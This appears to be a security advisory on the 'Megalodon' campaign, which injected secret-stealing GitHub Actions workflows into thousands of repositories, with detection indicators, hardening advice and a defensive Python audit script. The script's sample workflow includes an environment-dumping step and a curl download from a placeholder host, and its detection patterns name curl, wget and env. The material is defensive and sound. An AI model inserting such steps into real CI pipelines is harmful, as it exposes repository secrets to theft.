A newly disclosed automated attack campaign dubbed Megalodon has targeted thousands of GitHub repositories with malicious CI/CD workflow injections, pushing 5,718 malicious commits across 5,561 repositories within a single six-hour window — a pace that dramatically outstrips human defenders' ability to respond.
Attack Mechanics
Researchers report that Megalodon used a network of throwaway GitHub accounts with forged author identities designed to blend into automated pipeline activity. Account names observed include:
- build-bot
- auto-ci
- ci-bot
- pipeline-bot
These names are deliberately chosen to mimic legitimate CI/CD service accounts commonly found in enterprise development environments, making malicious commits harder to spot in high-volume repositories.
Workflow Injection
The attack's primary payload consists of malicious GitHub Actions workflow files injected into targeted repositories. These rogue workflows are designed to:
- Exfiltrate repository secrets — including API keys, tokens, and credentials stored as GitHub Actions secrets
- Establish persistence through workflow triggers that fire on every future commit or pull request
- Pivot to downstream dependencies to potentially spread the infection further through the software supply chain
Why This Attack Is Alarming
The sheer velocity of the Megalodon campaign — over 5,500 repositories compromised in six hours — represents a new benchmark for automated supply chain attacks. Prior major campaigns, including the 2024 tj-actions/changed-files incident and the 2025 Mini Shai-Hulud worm, operated over days or weeks.
Key concerns include:
- Scale over stealth: By targeting thousands of repositories simultaneously, attackers maximize the probability that at least some targets contain high-value secrets
- Automated proliferation: Throwaway accounts enable rapid scaling with minimal cost, as each account can be abandoned once detected
- CI/CD as attack surface: Workflow files run in trusted environments with elevated privileges, making them ideal vectors for credential theft
Affected Repositories
The campaign appears to have targeted public repositories across multiple programming language ecosystems, particularly those with active CI/CD pipelines. Repositories using GitHub Actions for automated testing, deployment, or publishing are at elevated risk, as these typically have access to sensitive environment secrets.
Detection and Response
Organizations should audit their repositories for unexpected workflow file additions or modifications, particularly files in .github/workflows/ created by unfamiliar accounts. Specific indicators include:
- Workflow files committed by accounts with bot-like names not previously associated with the project
- Newly added curl, wget, or env commands within workflow steps that were not part of the original pipeline
- Unexpected workflow run activity in repository audit logs
Recommended Hardening Measures
- Review GitHub Actions permissions — use the principle of least privilege; avoid granting write permissions to GITHUB_TOKEN unless necessary
- Pin Actions to commit SHAs rather than tags to prevent tag-based supply chain attacks
- Enable branch protection rules requiring pull request reviews before merging workflow file changes
- Rotate any secrets exposed in repositories that received unsolicited commits
- Enable GitHub's secret scanning and push protection to block accidental secret commits
- Audit third-party workflow dependencies regularly
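As an added illustration of the detection indicators and hardening points above (example code written for this page, not tooling from the researchers or GitHub), the following Python audit flags workflow-level write-all permissions, actions not pinned to a 40-character commit SHA, and run steps that invoke curl, wget, or env, and a second helper flags bot-like committer logins that are not on a project's known CI account list. The sample workflow text, the placeholder SHA, and the bot-name pattern are constructed assumptions.

```python
import re

# Constructed sample workflow (not a Megalodon payload) that contains the
# indicators the article lists: an env step, a curl step, a tag-pinned action,
# and a blanket write-all grant. The 40-hex SHA is a placeholder, not a real commit.
SAMPLE_WORKFLOW = """\
name: ci
on: [push, pull_request]
permissions: write-all
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567
      - name: Dump environment
        run: env
      - name: Fetch helper
        run: curl -fsSL https://placeholder.invalid/setup.sh -o setup.sh
      - run: npm test
"""

USES_LINE = re.compile(r"^\s*-?\s*uses:\s*(\S+)")
SHA_PINNED = re.compile(r"^\s*-?\s*uses:\s*\S+@[0-9a-f]{40}\s*$")
RUN_LINE = re.compile(r"^\s*-?\s*run:\s*(.*)$")
RISKY_CMD = re.compile(r"\b(curl|wget|env)\b")
# Assumed naming pattern modelled on the throwaway accounts named in the article.
BOT_NAME = re.compile(r"(^|-)(bot|ci|auto|pipeline)(-|$)", re.IGNORECASE)


def audit_workflow(text):
    """Return (line_no, reason) findings for a workflow file's text."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if re.match(r"^\s*permissions:\s*write-all", line):
            findings.append((n, "workflow-level write-all permissions"))
        m = USES_LINE.match(line)
        if m and not SHA_PINNED.match(line):
            findings.append((n, f"action not pinned to commit SHA: {m.group(1)}"))
        m = RUN_LINE.match(line)
        if m:
            for cmd in sorted(set(RISKY_CMD.findall(m.group(1)))):
                findings.append((n, f"run step invokes {cmd}"))
    return findings


def suspicious_author(login, known_accounts):
    """True for bot-like logins not on the project's list of known CI accounts."""
    return login not in known_accounts and bool(BOT_NAME.search(login))
```

Run `audit_workflow` over each file under .github/workflows/ at the suspect commit and pass each commit's author login to `suspicious_author` with the project's allowlist.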
Broader Supply Chain Context
Megalodon arrives amid a wave of supply chain attacks targeting developer infrastructure. The campaign shares tactical similarities with the Mini Shai-Hulud worm that compromised TanStack, Mistral AI, and other packages earlier in May 2026, and the Glassworm attacks that hijacked VS Code extensions in March 2026.
The trend points to a systematic effort by threat actors to exploit the trust placed in automated developer tooling — where a single compromised workflow or package can cascade into dozens of downstream victims.
GitHub has been notified and is reportedly working to remove the malicious commits and suspend the associated accounts.